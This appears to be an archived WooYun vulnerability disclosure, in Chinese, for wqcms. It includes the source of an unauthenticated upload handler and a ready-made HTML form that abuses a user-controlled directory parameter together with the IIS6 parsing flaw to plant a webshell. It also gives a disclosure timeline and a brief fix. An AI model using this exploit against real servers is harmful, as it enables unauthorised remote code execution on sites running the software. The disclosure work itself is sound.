乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-20: 细节已通知厂商并且等待厂商处理中 2014-06-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-08-19: 细节向核心白帽子及相关领域专家公开 2014-08-29: 细节向普通白帽子公开 2014-09-08: 细节向实习白帽子公开 2014-09-15: 细节向公众公开
wqcms最新版 获取webshell 无需登录 默认配置求顺便帮这个也审核了吧http://wooyun.org/bugs/wooyun-2014-065309/trace/b854f00000a861e49bd22dd330fc350a
结合iis6解析漏洞 就可以获取webshell了admin_wqSwfUpload.aspx源码如下
public void Page_Init(object sender, EventArgs e){ base.mustLogin = false; //无需登录 base.Page_Init(sender, e);}
public void Page_Load(object sender, EventArgs e){ this.method_1();}private void method_1(){ string str = string.Format("upload/{0}/", DateTime.Now.ToString("yyyy-MM")); string s = string.Empty; if (!string.IsNullOrEmpty(base.Request.QueryString["file"]))//file可自由控制 { str = string.Format("{0}/{1}", str, base.Request.QueryString["file"]); } bool flag = false; HttpPostedFile file = base.Request.Files["Filedata"]; string str5 = Path.GetExtension(file.FileName).ToLower(); string[] strArray = new string[] { ".gif", ".png", ".jpeg", ".jpg" }; for (int i = 0; i < strArray.Length; i++) { if (str5 == strArray[i]) { flag = true; } } if (flag) { if (!Directory.Exists(base.Server.MapPath(str))) //这里判断目录是否存在不存在就创建目录 由于file我们可以自己控制 如果目录为1.asp 那么等下上传图片就可以跟进解析漏洞获取webshell了 { Directory.CreateDirectory(base.Server.MapPath(str)); } Random random = new Random(); string str6 = DateTime.Now.ToString("yyyyMMddHHmm") + random.Next(0x2710).ToString(); str = string.Format("{0}{1}{2}", str, str6, str5); s = str; file.SaveAs(base.Server.MapPath(str)); //保存 FileInfo info = new FileInfo(base.Server.MapPath(str)); if (info.Length < 0x7d000L) { string input = WbIO.ReadFile(base.Server.MapPath(str)); string str3 = str5.TrimStart(new char[] { '.' }); if ((((str3 != "html") && (str3 != "txt")) && ((str3 != "htm") && (str3 != "asp"))) && (((str3 != "aspx") && (str3 != "php")) && Regex.IsMatch(input, "<html|<script|<object", RegexOptions.Singleline | RegexOptions.Compiled | RegexOptions.IgnoreCase))) { File.Delete(base.Server.MapPath(str)); return; } } info = null; } base.Response.StatusCode = 200; base.Response.Write(s);}
cms6.0版本这里就本地测试吧利用代码如下
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" ><head> <title>upload</title></head><body><form method="post" action="http://192.168.1.104/admin_wqSwfUpload.aspx?file=3.asp/" enctype="multipart/form-data"" ><input type="file" name="Filedata" /><input type="submit" name="tijiao" value="confirm"/></form></body></html>
上传后
文件名还是很容易获取的
file设置成绝对值不要让用户输入
危害等级:无影响厂商忽略
忽略时间:2014-09-15 09:06
暂无